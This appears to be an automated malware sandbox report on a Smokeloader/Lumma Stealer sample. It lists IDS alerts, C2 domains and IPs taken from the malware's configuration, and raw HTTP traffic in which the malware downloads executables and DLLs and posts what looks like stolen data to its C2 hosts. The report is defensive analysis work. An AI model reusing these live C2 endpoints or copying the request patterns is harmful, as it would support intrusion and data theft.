Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_02144B47
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	7_2_02122807
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edi, ebx	7_2_021568D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	7_2_021348C7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_021518E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	7_2_02130918
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	7_2_02153E13
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_0212FE1B
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	7_2_02143ECF
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	7_2_02143EFE
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp dword ptr [004421CCh]	7_2_0213CF1A
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_02145F55
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h]	7_2_02141C89
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_02142D5B
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	7_2_0212CD77
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	7_2_02135D61

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49708 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49709 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49710 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49711 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49712 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53061 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.8:51397 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53069 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53070 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53072 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53073 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53079 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53080 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53083 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53084 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53115 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53116 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53117 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53118 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53119 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53120 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53121 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53122 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53123 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53124 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53125 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53126 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53127 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53128 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53129 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53130 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53131 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53132 -> 190.147.128.172:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.13.174.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.147.128.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Mon, 27 May 2024 13:20:02 GMTConnection: keep-aliveETag: "66548882-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 May 2024 13:24:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 27 May 2024 13:22:08 GMTETag: "1e5000-6196f67744000"Accept-Ranges: bytesContent-Length: 1986560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 40 07 00 00 0c 17 00 00 00 00 00 e0 4d 07 00 00 10 00 00 00 50 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 1e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 84 21 00 00 00 90 08 00 00 26 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 74 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 3e 07 00 00 10 00 00 00 40 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 44 29 00 00 00 50 07 00 00 2a 00 00 00 44 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 f9 11 00 00 00 80 07 00 00 00 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 84 21 00 00 00 a0 07 00 00 22 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 14 00 00 00 00 d0 07 00 00 00 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 74 96 00 00 00 f0 07 00 00 98 00 00 00 92 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 26 16 00 00 90 08 00 00 26 16 00 00 2a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 1e 00 00 00 00 00 00 50 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.145.40.124 23.145.40.124
Source: Joe Sandbox View	IP Address: 109.175.29.39 109.175.29.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View	ASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5435Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569527Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 5329Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 113601Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://spqqefesecvvfpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxgcikcstvjhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://deiljvysjqajyam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tgeabjhcrwocia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hfipxhiwprpsvl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mdyttvvsjifyxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://faqldvcxoayalcyp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: dbfhns.in
